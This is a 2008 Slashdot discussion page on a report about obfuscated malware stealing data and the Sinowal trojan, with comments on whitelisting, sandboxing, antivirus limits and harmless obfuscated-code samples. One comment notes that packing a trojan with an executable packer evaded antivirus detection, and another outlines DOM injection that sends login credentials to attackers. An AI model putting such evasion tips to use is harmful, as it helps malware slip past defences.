Forgot your password?
typodupeerror
Security Programming IT Technology News

Stealing Data With Obfuscated Code 101

Posted by Soulskill
from the malware-arms-race dept.
Weblver1 writes "A recent report by web security firm Finjan shows how easily data can be accessed on PCs by malware which circumvents existing defenses. With the use of obfuscated code, antivirus software and static Web filters could not identify the scrambled attack code as a threat. The report walks through a real-life scenario of the infection process step-by-step, and tracks what happens to the stolen data. This demonstrates how stealing sensitive data has become unbearably easy — especially, given the abundance of easy-to-use DIY crimeware toolkits. Finjan's report is available here (PDF, registration required). Shortly after this report, Security firm RSA has released their findings of a huge amount of stolen 'virtual wallets' in one of the largest discoveries of stolen data from computers compromised by the Sinowal trojan. While the trojan can be traced back to 2006, it managed to become more productive over time with frequent variants. Given the scale, ease of use, and hiding techniques making infections extremely difficult to find, no wonder today's crimeware achieves such 'impressive' results."
This discussion has been archived. No new comments can be posted.

Stealing Data With Obfuscated Code

Comments Filter:
  • Obfuscation 101 (Score:5, Interesting)

    by kbrasee (1379057) on Saturday November 01, 2008 @12:30PM (#25595483) Homepage
    X=1024; Y=768; A=3;

    J=0;K=-10;L=-7;M=1296;N=36;O=255;P=9;_=1<<15;E;S;C;D;F(b){E="1""111886:6:??AAF"
    "FHHMMOO55557799@@>>>BBBGGIIKK"[b]-64;C="C@=::C@@==@=:C@=:C@=:C5""31/513/5131/"
    "31/531/53"[b ]-64;S=b<22?9:0;D=2;}I(x,Y,X){Y?(X^=Y,X*X>x?(X^=Y):0,  I (x,Y/2,X
    )):(E=X);      }H(x){I(x,    _,0);}p;q(        c,x,y,z,k,l,m,a,          b){F(c
    );x-=E*M     ;y-=S*M           ;z-=C*M         ;b=x*       x/M+         y*y/M+z
    *z/M-D*D    *M;a=-x              *k/M     -y*l/M-z        *m/M;    p=((b=a*a/M-
    b)>=0?(I    (b*M,_      ,0),b    =E,      a+(a>b      ?-b:b)):     -1.0);}Z;W;o
    (c,x,y,     z,k,l,    m,a){Z=!    c?      -1:Z;c     <44?(q(c,x         ,y,z,k,
    l,m,0,0     ),(p>      0&&c!=     a&&        (p<W         ||Z<0)          )?(W=
    p,Z=c):     0,o(c+         1,    x,y,z,        k,l,          m,a)):0     ;}Q;T;
    U;u;v;w    ;n(e,f,g,            h,i,j,d,a,    b,V){o(0      ,e,f,g,h,i,j,a);d>0
    &&Z>=0? (e+=h*W/M,f+=i*W/M,g+=j*W/M,F(Z),u=e-E*M,v=f-S*M,w=g-C*M,b=(-2*u-2*v+w)
    /3,H(u*u+v*v+w*w),b/=D,b*=b,b*=200,b/=(M*M),V=Z,E!=0?(u=-u*M/E,v=-v*M/E,w=-w*M/
    E):0,E=(h*u+i*v+j*w)/M,h-=u*E/(M/2),i-=v*E/(M/2),j-=w*E/(M/2),n(e,f,g,h,i,j,d-1
    ,Z,0,0),Q/=2,T/=2,       U/=2,V=V<22?7:  (V<30?1:(V<38?2:(V<44?4:(V==44?6:3))))
    ,Q+=V&1?b:0,T                +=V&2?b        :0,U+=V    &4?b:0)     :(d==P?(g+=2
    ,j=g>0?g/8:g/     20):0,j    >0?(U=     j    *j/M,Q      =255-    250*U/M,T=255
    -150*U/M,U=255    -100    *U/M):(U    =j*j     /M,U<M           /5?(Q=255-210*U
    /M,T=255-435*U           /M,U=255    -720*      U/M):(U       -=M/5,Q=213-110*U
    /M,T=168-113*U    /       M,U=111               -85*U/M)      ),d!=P?(Q/=2,T/=2
    ,U/=2):0);Q=Q<    0?0:      Q>O?     O:          Q;T=T<0?    0:T>O?O:T;U=U<0?0:
    U>O?O:U;}R;G;B    ;t(x,y     ,a,    b){n(M*J+M    *40*(A*x   +a)/X/A-M*20,M*K,M
    *L-M*30*(A*y+b)/Y/A+M*15,0,M,0,P,  -1,0,0);R+=Q    ;G+=T;B   +=U;++a<A?t(x,y,a,
    b):(++b<A?t(x,y,0,b):0);}r(x,y){R=G=B=0;t(x,y,0,0);x<X?(printf("%c%c%c",R/A/A,G
    /A/A,B/A/A),r(x+1,y)):0;}s(y){r(0,--y?s(y),y:y);}main(){printf("P6\n%i %i\n255"
    "\n",X,Y);s(Y);}
    • by peektwice (726616)
      That's funny. The Perl Journal had those obfuscated contests too. Here was my lone attempt:
      #!/usr/bin/perl
      for(unpack('C*',pack "H*",unpack "u", "B,\&\$V8S8Q-F4W,C>U-F8T83\(P-F,W,C8U-3\`R,#8U-C\@U-\`\`\`")){unshift @^O,$_};foreach $_(@^O){print pack('c*',$_)};print " \n";
    • by fyrewulff (702920) on Saturday November 01, 2008 @02:44PM (#25596467)
      Drink.... more.... Ovaltine?!?
      • by mrmeval (662166)

        NO! http://www.schlockmercenary.com/d/20010225.html [schlockmercenary.com]

        Imitation Ovalkwik!

        Glucose, fructose, corn syrup solids, concentrated cocoa-bean extract, assorted methylxanthine alkaloids (including caffeine, theobromine, and theophylline), sodium laureth sulfate, Minoxadyl, buckminster fullerene, codeine, hyper-ephedrine, nicotine, with BHA and BHT added to preserve freshness.

  • by liquidpele (663430) on Saturday November 01, 2008 @12:34PM (#25595513) Journal
    Once it has the potential to run on your system, you're basically already screwed. Antivirus companies help a little by catching the known works and viruses that have been around for a while, but in return usually slow the system down as well. As always, the only thing you can do is keep your software updated, don't run programs or code you don't trust, don't let people on your system that you don't trust to keep the system clean, and hope for the best.
    • by khasim (1285) <brandioch.conner@gmail.com> on Saturday November 01, 2008 @12:42PM (#25595553)

      http://www.ranum.com/security/computer_security/editorials/dumb/index.html [ranum.com]

      Why bother with anti-virus for the system itself? (Note: anti-virus is acceptable for mail servers or file servers.)

      Instead, why not focus on identifying the known good code ... and quarantining anything else?

      Maybe there aren't an infinite number of ways to obfuscate code (eventually your obfuscation would exceed the capacity of the local hard drive) but there are FAR more ways to obfuscate code so it bypasses the anti-virus scanners than there are bits of known good code.

      I should be able to boot from some form of rescue CD with a HUGE list of filenames, checksums, etc ... and what application they are associated with ... and validate every single file on a workstation. And then quarantine everything else so it can be manually verified.

      There, even if you get infected, the disinfection is simple AND effective.

      • Re: (Score:3, Interesting)

        by postbigbang (761081)

        To answer your question:

        Because you'll be p0wn3d in no time. Trust what? AV libraries are mostly behind the times and can't smell subtle variations. They suck, generally. Test after test shows just how bad they are.

        There doesn't have to be an infinite number of obfuscations. Just one will do. That's why trusting any code can be simply stupid. Anything can get infected, there are tons of vectors.

        Getting disinfected doesn't necessarily work, either. Usually the initial infection vector still exists (the haple

        • That's what I said. (Score:5, Informative)

          by khasim (1285) <brandioch.conner@gmail.com> on Saturday November 01, 2008 @01:41PM (#25595995)

          Because you'll be p0wn3d in no time. Trust what? AV libraries are mostly behind the times and can't smell subtle variations.

          That's what I said. While there isn't an infinite number of variations, there are far more variations possible than there are known good bits.

          So do NOT try to solve this problem by matching "bad" patterns.

          Match known good patterns and quarantine everything else.

          Getting disinfected doesn't necessarily work, either. Usually the initial infection vector still exists (the hapless user).

          The user will ALWAYS be the weakest link. As the article I linked to stated, if education could work, it would have worked by now.

          Instead, focus on building systems that MINIMIZE the vulnerability and that make it EASY to RECOVER when it is cracked.

          Quarantining code is folly.

          That's your opinion. I can show that it does work.

          Active and varied defenses and re-writes and restores to RO media help.

          Huh? How about some specifics? Because that isn't making sense to me.

          I scape so much crap from friends and relatives machines that I've got BartsCD built for most of them. I just re-write the registry after active scans, and re-write kernel, vmm, browser crap.

          How do you "re-write the registry"?

          Instead, imagine an anti-virus system that refuses to allow code to be installed in they system directories (or registered) unless it matches the checksums, names, etc on a list of known good apps. Then it just becomes a issue of keeping that list updated with the latest patches and upgrades.

          Instead of downloading the daily list of suspected BAD patterns, you'd be downloading a list of known good patterns. And that would only need to be updated prior to something being installed on the system.

          For a business looking to manage thousands of PC's ... all with the same basic apps and patch levels and such ... this would be so much easier than trying to maintain the current anti-virus system (engine upgrades, signature upgrades). Nothing would be installed that was not pre-approved by their department.

          • Re: (Score:2, Insightful)

            Match known good patterns and quarantine everything else.

            That's fine in a business environment where you have a floor of users all running an Office Suite of programs.

            In any other setting it stifles innovation. Which is fine, if you work for a big company operated by stuffed suits.

            White lists are an excellent opportunity for the people and organizations not afflicted with an IT staff who impose them.

            But, then, 'IT' is just the new word for file clerk. Keep those files all neat and in order, clerks.

            • by Locklin (1074657)

              It could still work, on Linux. Suppose you had a program that checks the md5 of every executable file and library on the system with the distro's repository. Then creates a list of the remaining files to be confirmed manually. People writing software could simply manually mark their own software, or non-packaged software as needed.

              • The problem with open source is simple : authors don't bother, which makes their apps vulnerable in transmission, and the source itself can be infected.

                Of course really providing unbreakeable process isolation is evil (drm-enforcement, palladium, microsoft)

                Redhat, btw, does do this, but nobody really bothers to check their installation.

                And as for the anti-virus companies, every virus author runs all the antivirus tools against his new creation (obviously).

              • by tepples (727027)

                People writing software could simply manually mark their own software, or non-packaged software as needed.

                So how would malware not mark itself in the same way?

                • by RockDoctor (15477)

                  People writing software could simply manually mark their own software, or non-packaged software as needed.

                  So how would malware not mark itself in the same way?

                  The "mark" would need to be made using something like a public-key signature system. The signature contains the path of the OK'd file, it's MDx hash (doesn't particularly matter which hash you choose), and the public key ID of the person who says it's OK, then sign it with that person's private key. The "OK" mark should be trivial to check then.
                  In add

                  • The "mark" would need to be made using something like a public-key signature system. [...] In addition, since you're talking about someone's within-company ID

                    The system you describe is very similar to the existing Authenticode system, with the company as the root CA. It would work within a sufficiently large company, which applies something like Windows group policy across a domain. But do you know any way this system could be extended to a home or home office environment? Adware and surveillanceware published by large companies routinely gets signed, and legitimate free software maintained by amateurs remains unsigned because the extra $200 per year to keep the

                    • by RockDoctor (15477)

                      The system you describe is very similar to the existing Authenticode system, with the company as the root CA.

                      I'll take your word for it. "Authenticode" rings a (faint) bell.

                      It would work within a sufficiently large company, which applies something like Windows group policy across a domain.

                      I'll take your word for it. I remember trying to get my head around the difference between a domain and a subnetwork yonks ago, and failing. It seems to be an incoherent mess - every company implementing different things d

                    • by tepples (727027)

                      I don't know what you mean by "home" or "home office" environment - at least in some way that differentiates it from any other office environment.

                      A home environment has no dedicated IT personnel to try new programs in a sandbox to determine that they're not likely to misbehave in production. That's why some Slashdot users have proposed [slashdot.org] installing every application into a separate sandbox, but then that would involve work on Microsoft's part to add support in the system libraries and the Windows user interface for managing sandboxes.

                      I've got better uses for the money. But then, I don't make my living by writing software. [...] Is $200 more than you're willing to pay as part of the cost of being in that business?

                      As you started to recognize, not everybody who develops software does it as a business. Some are employed in other field

                    • by RockDoctor (15477)

                      If you get your pet free software project picked up by a company or a software foundation, signing software for public use is well worth it. Otherwise, $100 to $200 per supported platform per year can make it a really expensive hobby.

                      You need a different signature key for each platform?? Weird. And probably unhealthy.

                    • by tepples (727027)

                      You need a different signature key for each platform??

                      Yes. Authenticode certificates work only on Windows. iPhone SDK certificates work only on iPhone. XNA Creators Club certificates work only on Xbox 360.

                    • by RockDoctor (15477)
                      This bloody "new" discussion system seems to have lost my previous reply. What I want to know is, what did I do to get it turned on, so I can avoid doing that in future?

                      Do you know of a cross-platform code authentication system? You seem to have some sort of professional stake in code development.

                      I would guess that the only way such could work would be to distribute a package of pre-compiled binaries, separated into chunks (libraries) which are processor-specific versus processor-agnostic, together with lin

            • I am a developer - I run my compiler it generates an EXE - It get quarantined...

              It simply is not practical in a "real world" situation except on a locked down one task PC

              A firewall, the latest updates, and a user who cannot install/run new programs easily is far more secure (not perfect but more reliable)

              I would like to know how the PC was infected : this is the only interesting bit - what happens after is largely irrelevant, once a PC can be persuaded to run arbitrary code then the payload can be anything

          • Web 2.0 RIP (Score:3, Interesting)

            by PPH (736903)

            That will kill Web 2.0 technologies. Or anything where content/service providers expect you to run their code on your system. None of the schemes for whitelisting, signed certificates, checksums, etc. can handle the sheer volume of apps. that these new services expect you to handle. They work well for manually downloaded and installed applications and packages. But not when every kid with a FaceBook page has a game or other cure widget they want you to download.

            The sheer volume of web apps of this type will

            • by Wildclaw (15718)

              It is perfectly possible to run programs that aren't trusted. You just can't allow them to do certain things. This is the main principle of sandboxing, and a good operating system should sandbox every single application completly, unless someone with administrator privileges requests otherwise. And even such requests should only be exceptions to the sandboxing.

              I am running every program I don't trust sandboxed with sandboxie [sandboxie.com]. It isn't a perfect solution as it isn't as well integrated into the system as it c

              • by PPH (736903)

                unless someone with administrator privileges requests otherwise.

                Which, for most PCs, happens to be the user, Joe Sixpack. To whom, most UAC popups look like:

                Blah, blah blah blah. Blah access blah blah blah. Blah.
                [Cancel] or [Allow]

                All Joe Sixpack cares about is which button will make the nasty box go away the fastest.

                • by Wildclaw (15718)

                  True. But you can never protect idiots. It is doomed from the start.

                  However, modern operating systems fails to even protect people who aren't stupid. It is way too easy to get malware installed on machinem and far too difficult to remove it.

          • Re: (Score:3, Interesting)

            by postbigbang (761081)

            It's possible to write a known good kernel and a matching set of registry hives (the whole thing can be dangerous) along with vmm, hiberfile and so on to DVD. Using BartsCD, one boots XP, does the restoration, and easily moves on.

            There's a certain amount of sense in trying to protect groups of users, in business environments, and so on. An individual will be eventually cracked somehow on Windows. It's tougher to do on Linux, and still tougher on MacOS and xBSD and OpenSolaris.

            Still, I watch everyone ignore

            • It's tougher to do on Linux, and still tougher on MacOS and xBSD and OpenSolaris.

              How so? Security is really very much the same between Linux and any other Unix-like OS.
      • by sakonofie (979872)

        validate every single file on a workstation.

        The problem with a white list is that in order for it be effective it can't have too many false negatives. Having the white list validation program go ape shit over every file that isn't on it isn't all that helpful. I don't really want to have to hit ignore for every file in /home and most of my configuration files. (To get around this you could just update the white list, but this would have to be done every time a file is edited, but this is too frequent, so what is the right frequency, etc.)
        Also whit

      • by bit01 (644603) on Saturday November 01, 2008 @01:42PM (#25596001)

        Yes. To verify a system is uncompromised from a possibly compromised system is idiotic. If a person doesn't understand this then they are not a competent programmer.

        I've said for years that most "anti-virus" companies are engaged in fraud and the CEO's of most "anti-virus" companies should've been in jail for it a long time ago. It shows how low the IT industry has sunk when even quite basic fraud like this is being allowed to continue. At the very least there should have been a class-action lawsuit.

        The only way to truly verify a system is good is to do it from a known good system. For a standalone PC that means booting off known-good read-only media, usually a CDROM, and using that to verify the checksums of all the critical files on the hard disk. To handle updates the CDROM needs to have enough smarts to download signed checksums of updates off the net and storing them in encrypted form (so malware can't tamper with it) on read-write media, preferably a memory key only inserted into the system when booted off the read-only media.

        Part of the reason this has not been done until now is that third parties could not easily read the proprietary undocumented NTFS file system, because BS OS licensing made it difficult and expensive to have a separate boot and because M$, incredibly, stopped shipping CDROM's of their OS. Now that NTFS has been reverse engineered it is possible to create a third-party Linux CDROM that can do all of the above. This is the only practical way to stop the Windows virus pandemic. Ironic that the best way to verify a windows system may be to use a linux system.

        To anticipate a few questions:

        • Yes, Joe Sixpack is perfectly capable of inserting a CDROM, pressing the reset key and following the limited instructions (ie. get professional help if a virus is found or recover files off the known good distribution media).
        • Yes, this approach perfectly capable of protecting Joe Sixpack's personal files if the CDROM has enough smarts to back up personal files and check sum them every time it is run. Even if it doesn't do this it's still verifying the system is uncompromised.
        • Yes, it's perfectly capable of verifying every executable on the system, including those not initially distributed with the OS.
        • Yes, both whitelist and blacklist checksumming is possible at the same time. What a concept!
        • Good system/network administrators already automatically, regularly checksum verify all the systems they manage to verify their systems have not been corrupted, whether by a virus or a hardware error. It works. If they don't they are mediocre administrator at best.

        M$ is perfectly capable of creating such a CDROM however those "professionals" have chosen not to and allow the virus/bot pandemic to continue. And they wonder why some people don't like them.

        ---

        Ownership, by definition, is the right to control something. Any ethical (not legal) argument based on "because they own it" is bogus.

        • by Angostura (703910)

          Yes, it's perfectly capable of verifying every executable on the system, including those not initially distributed with the OS.

          I'm very very sceptical of this claim. But I'm willing to wait and hear your methodology.

        • by rew (6140)

          The only way to truly verify a system is good is to do it from a known good system. For a standalone PC that means booting off known-good read-only media, usually a CDROM,
          Here you have a slight problem with implementing your suggestion: The CPU boots off the read-write flash chips on the motherboard, not off the CDROM.

      • If you update executable files or libraries, you'd have to re-whitelist them. That means you essentially have to turn off the whitelist, update, and then tell the whitelist to baseline to the new system. While ideally that would work, it puts a lot of responsibility on the user which won't work out so well.

        For Linux, it could be easier though since you could combine doing that in the package software (apt/yum/whatever), but because software on Windows all updates differently, it would be a nightmare.
      • Problem being that there is no such thing as known good code. Even if you saw all of the source code and compiled it yourself, there is always the possibility that the compiler or linker/loader introduced a back door (this problem has been known for a long time). The best you could say is that certain code is trusted. On the other hand, there is such a thing as known bad code.
        • by walshy007 (906710)

          there is always the possibility that the compiler or linker/loader introduced a back door

          Problem being that there is no such thing as known good code.

          I disagree, you can use gdb to go through the compiled binary and watch what it does, but since it is not yet trusted, even when doing that do it on a vm. same thing with disassemblers. If I've scoured through all of the assembly and still find nothing, I'd say it's known good code, can't wouldn't say the same for the libraries it calls until they are inspected also. You would want it to be a very special program to justify that kind of work though.

          • by idontgno (624372)

            Don't forget, too, that the toolchain you're using to do your diagnostics can be the source of the hack.

            ...You can't trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware

        • by bhtooefr (649901)

          What if you wrote the compiler yourself, in assembly?

          Then, the exploits would only be at the BIOS or hardware level...

      • If you add "why not quarantine everything" you're at what microsoft is trying to do with palladium.

        Obviously one of the first side-effects is simple : that quarantine, unoverrideable (which is what security researchers want), is exactly what you need to implement "real" drm.

    • by Jessta (666101)

      Nothing can protect you?
      how about not running code that is malicious?

      I've always found the concept of 'computer security' fairly strange. It's your computer, you control what runs on it...
      why are people running code that acts counter to their interests?
      why are operating systems designed in such a way that a user can have no idea what a program is going to do?

      Seems kind of insane to me.

      • You serious? "just don't run code that is malicious" is a ridiculous argument. What if it's a shareware program they get that's been tainted to also install a trojan? What if it's a worm making use of a 0-day vuln and they don't even have to manually run something? Computers are just more complicated that that, sorry.
        • Re: (Score:3, Funny)

          by Jessta (666101)

          In fact you are wrong.
          Computer aren't as complicated as that.
          It's easy enough to design a system to make obscuring the purpose of a piece of code impossible and then have all programs define a contract with the system as to what resources they need to use on the system, this information is conveyed to the user in a nice way and now the user will know straight away if a program is going to act maliciously before they run it.

          0-day arbitrary code execution vulnerabilities are created due to a small set of thin

          • Re: (Score:3, Informative)

            by liquidpele (663430)
            Wow... your ignorance on the subject is quite funny.
          • There should be a contest of obfuscated english! I would vote on your post! kudos
          • It's easy enough to design a system to make obscuring the purpose of a piece of code impossible

            Given: The purpose of a piece of code is either to halt or to loop. Deciding even this has been proven impossible [wikipedia.org].

            and then have all programs define a contract with the system as to what resources they need to use on the system

            In other words, you're recommending sandboxing. That is a solved problem on OLPC [laptop.org] and on FreeBSD [wikipedia.org], but as far as I can see, no such software for creating and managing sandboxes comes with home editions of the Windows operating system.

            • by Jessta (666101)

              Given: The purpose of a piece of code is either to halt or to loop. Deciding even this has been proven impossible [wikipedia.org].

              This is only an issue for a complete Turing machine, by limiting what a program can do you can avoid this problem.

              The relevant parts of a possibly malicious program to a user or admin is how it interacts with the rest of the system. Because what ever it's doing is mostly irrelevant until it's outputting it to somewhere. This is very easy to notice and impossible to obscure. As all of this interaction goes through calls to system libraries

              and then have all programs define a contract with the system as to what resources they need to use on the system

              In other words, you're recommending sandboxing....I can see, no such software for creating and managing sandboxes comes with home editions of the Windows operating system.

              I wasn't actually recommending sandboxing, I was recommending languag

              • by tepples (727027)

                The relevant parts of a possibly malicious program to a user or admin is how it interacts with the rest of the system. Because what ever it's doing is mostly irrelevant until it's outputting it to somewhere.

                And sandboxes are designed to control how a program interacts with the rest of the system.

                I was recommending language based system security(singularity, inferno etc).

                Most languages still can't parse string arguments deeply enough to distinguish open() in the user's home directory from open() elsewhere. That's the responsibility of runtime security such as ACLs or capabilities, and sandboxing is just a finer-grained way to assign capabilities than the traditional user/group model.

                Why even run untrustworthy code?

                Because the major vendors of computer hardware for use in a home environment have declined to provide a

                • by Jessta (666101)

                  And sandboxes are designed to control how a program interacts with the rest of the system.

                  Sandboxing is usually about controlling an untrusted program and denying it access to requested resources it's not authorised to access. I'd prefer a program was trusted and didn't make requests for access to unauthorised resources.

                  Most languages still can't parse string arguments deeply enough to distinguish open() in the user's home directory from open() elsewhere...

                  Yeah, so you don't even include open() in the standard lib of the language, so the programmer can't even make the request. Then you create a different syscall that's more restricted. Similar to how the Bitfrost #P_DOCUMENT [laptop.org] section handles it.

                  Why even run untrustworthy code?

                  Because the major vendors of computer hardware for use in a home environment have declined to provide a convenient way to mark code developed by an amateur programmer as trustworthy.

                  This doesn't require hardware support(

    • by jesterzog (189797)

      As always, the only thing you can do is keep your software updated, don't run programs or code you don't trust, don't let people on your system that you don't trust to keep the system clean, and hope for the best.

      I'd add regular backups of important data to that list.

  • by James_Duncan8181 (588316) on Saturday November 01, 2008 @12:34PM (#25595515) Homepage

    But when people say that we should have only one distro, and that it's a problem that different distros use different versions of software and insert their own patches...this is why they are wrong wrong wrong.

    Monocultures FTL.

    • Re: (Score:3, Informative)

      by CSMatt (1175471)

      Except that a lot of distributions are based on only a handful of larger distributions. Any bugs present in the parent distribution can surface in all of the others that are based on it. Debian's OpenSSL flaws are a good example.

    • The differences between Linux distros are big enough to annoy programmers with better things to do, but small enough that you can still write a virus that works on all of them if you want to. So it's actually the worst of all possible worlds.

  • by antifoidulus (807088) on Saturday November 01, 2008 @12:39PM (#25595537) Homepage Journal
    Surfin'Shield [cigital.com] sort of drowned. There is probably a similar scam behind this "research"....
  • Not a new solution but effective in its day. Poses problems for todays dynamic content/programs but if identifying alien code is the goal programs such as tripwire are a step in the right direction.
  • I'm not sure if this is still the case but back in the day using an exe packer (like upx [sourceforge.net]) on a trojan or virus would prevent detection by most anti-virus software and as an added bonus the payload also becomes much smaller
  • Will using only live CDs work? With a white list?

  • Everything Open Source + People collaboratively and systematically review source codes
  • Of course this doesn't really apply to web browser hijacks, but you can at least intercept a lot of your outgoing traffic. The problem is that most people just click the ok button willy nilly because they want to see it go away.

    • Re: (Score:1, Flamebait)

      by Laebshade (643478)

      Outbound firewalls are for people who don't know what they're doing or who support users who don't/want to stop them from doing something.

      • by ShinmaWa (449201) on Saturday November 01, 2008 @02:23PM (#25596313)

        Outbound firewalls are for people who don't know what they're doing

        What an incredibly ignorant and stupid thing to say.

        I definitely know what I'm doing and I use my outbound firewall to its fullest extent. Having the ability to proactively determine what software can and can't touch the network, be it establishing a connection or binding to a port, in conjunction with a proper hardware solution provides not only good protection, but also serves as an early warning system when an unknown program attempts to go to an unknown site for an unknown reason.

        Granted, outbound firewalls are not perfect. If a whitelisted application is compromised, then it this firewall doesn't provide much protection. This is why outbound firewalls should be but one of several items in your security toolbox.

        However, to wave your hand and claim they are only for people who don't know what they are doing shows a level of arrogance that usually gets corrected only after you are compromised.

        • I short: he knows what he is doing, but what the computer is doing is quite a different matter
  • For the truly paranoid, what are the best tools to run on your system to detect potential intrusion of this type?
  • if(isroot = 1){ (Score:3, Insightful)

    by davolfman (1245316) on Saturday November 01, 2008 @01:20PM (#25595843)
    Does this remind anyone else of the time someone tried to replace a conditional with an assignment and check it into the linux kernel to make a trigerable security hole?
    • by Alex Belits (437) *

      No.

    • I don't think the infamous "isroot = 1" is an example of obfuscated code.

      It is actually quite straightforward. I didn't RTFA (but again who does? ;-P ), but I guess the "obfuscated" malware is something like a just-in-time code spitter: the attack code is generated at runtime, on-demand, in an obfuscated manner, bypassing common antivirus software. If the payload is not hard-coded, the malware can masquerade itself as an innocuous application more easily.

      Correct me if I'm wrong.

  • by Anonymous Coward

    I've heard about a project at cert called function extraction that might be relevant to this. It's been going on a few years and they've produced some tools. Don't know much more.

    http://www.cert.org/sse/function_extraction.html [cert.org]

  • by CSMatt (1175471)

    Will someone please make a BugMeNot account for this site? I'm not registering just to view one PDF file.

  • by psydeshow (154300) on Saturday November 01, 2008 @01:52PM (#25596065) Homepage

    According to the Register article, the method of attack was DOM manipulation. The code waits until it sees a login form from a targeted site, and then it injects markup that sends the credentials to the bad guys on submit.

    We can speculate on whether that's true or not, but if it is then it should be fairly easy to use a bit more javascript (why not? heh.) to check the integrity of the DOM. Banks should also be randomizing the structure of their forms and the names/ids of form fields as a matter of course.

    Of course the attacks will evolve, but as long as you're going to play the game you've got to keep moving.

  • by Xenna (37238) on Saturday November 01, 2008 @02:32PM (#25596371)

    We used to call it polymorphic code. A much prettier name if you ask me.

    Been around since 1990:

    http://en.wikipedia.org/wiki/1260_(computer_virus) [wikipedia.org]

    • Re: (Score:2, Informative)

      by Bounb (1398651)
      Actually, polymorphic code is that which mutates whilst obfuscated code is that which is intentionally written as to mask the function of the code.

If you had better tools, you could more effectively demonstrate your total incompetence.

Working...